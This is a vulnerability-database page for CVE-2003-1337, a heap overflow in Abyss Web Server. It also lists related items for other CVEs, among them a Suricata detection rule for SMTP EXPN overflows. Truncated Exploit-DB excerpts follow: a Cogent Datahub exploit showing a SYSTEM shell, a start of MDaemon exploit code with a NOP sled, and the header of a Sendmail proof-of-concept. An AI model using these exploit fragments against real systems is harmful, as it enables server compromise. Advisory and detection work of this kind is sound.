CVE-2003-1337
Published 2003-12-31
CVE-2003-1337: Heap-based buffer overflow in Aprelium Abyss Web Server 1.1.2 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
Priority P3 · 42 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS: 12.27% (95.7th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aprelium_technologies | abyss_web_server | <= 1.1.2 | — |
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 10.0 CRITICAL
GHSA
GHSA-9j95-hw5q-64g3: Heap-based buffer overflow in Aprelium Abyss Web Server 1
ghsa_unreviewed·2022-04-29
CVE-2003-1337 [HIGH] CWE-119 GHSA-9j95-hw5q-64g3: Heap-based buffer overflow in Aprelium Abyss Web Server 1
Red Hat
security flaw
vendor_redhat·2003-03-29·CVSS 10.0
CVE-2003-0161 [CRITICAL] security flaw
The prescan() function in the address parser (parseaddr.c) in Sendmail before 8.12.9 does not properly handle certain conversions from char and int types, which can cause a length check to be disabled when Sendmail misinterprets an input value as a special "NOCHAR" control value, allowing attackers to cause a denial of service and possibly execute arbitrary code via a buffer overflow attack using messages, a different vulnerability than CVE-2002-1337.
Suricata
GPL SMTP EXPN overflow attempt
suricata·2010-09-23
CVE-2002-1337 GPL SMTP EXPN overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 (msg:"GPL SMTP EXPN overflow attempt"; flow:established,to_server; content:"EXPN"; nocase; isdataat:255,relative; content:!"|0a|"; within:255; pcre:"/^EXPN[^\n]{255}/smi"; reference:bugtraq,6991; reference:bugtraq,7230; reference:cve,2002-1337; reference:cve,2003-0161; classtype:attempted-admin; sid:2102259; rev:10; metadata:created_at 2010_09_23, cve CVE_2002_1337, confidence Medium, signature_severity Major, updated_at 2024_03_08;)
Exploit-DB
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
exploitdb·2011-09-22
CVE-2011-3493 Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
---
#!/usr/bin/python
#
# Cogent Datahub > @net__ninja || @luigi_auriemma
# example usage:
# [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130
#
# -----------------------------------------------------
# ------ Cogent Datahub Unicode Overflow Exploit ------
# ------------- Found by Luigi Auriemma ---------------
# --------- SYSTEM exploit by Steven Seeley -----------
#
# (+) Sending overflow...
# (+) Getting shell..
# Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded!
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami
# whoami
# nt authority\system
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaste
Exploit-DB
Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)
exploitdb·2003-12-29
CVE-2003-1200 Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/9317/info
It has been reported that MDaemon/WorldClient mail server may be prone to a buffer overflow vulnerability when handling certain messages with a 'From' field of over 249 bytes. This issue may allow a remote attacker to gain unauthorized access to a system.
Successful exploitation of this issue may allow an attacker to execute arbitrary code in the context of the vulnerable software in order to gain unauthorized access.
#include
#include
#include
#include
// Darn fucking 1337 macro shit
#define ISIP(m) (!(inet_addr(m) ==-1))
#define offset 267 //;267 //1024
// hmm :D
#define NOPS "\x90\x90\x90\x90\x90\x90\x90"
struct sh_fix
{
unsigned long _wsa
Exploit-DB
Sendmail 8.12.x - Header Processing Buffer Overflow (1)
exploitdb·2003-03-02
CVE-2002-1337 Sendmail 8.12.x - Header Processing Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/6991/info
Sendmail is prone to a remotely exploitable buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.
Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.
Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree.
/*## copyright LAST STAGE OF DELIRIUM mar 2003 poland *://lsd-pl.net/ #*/
/*## sendmail 8.11.6 #*/
/* proof of concept code for remote sendmail vulnerability */
/* usage: linx86_sendmail target [-l localaddr] [-b localport] [-p ptr] */
/* [-c co
http://archives.neohapsis.com/archives/bugtraq/2003-06/0235.html
http://www.securityfocus.com/bid/8062
https://exchange.xforce.ibmcloud.com/vulnerabilities/12466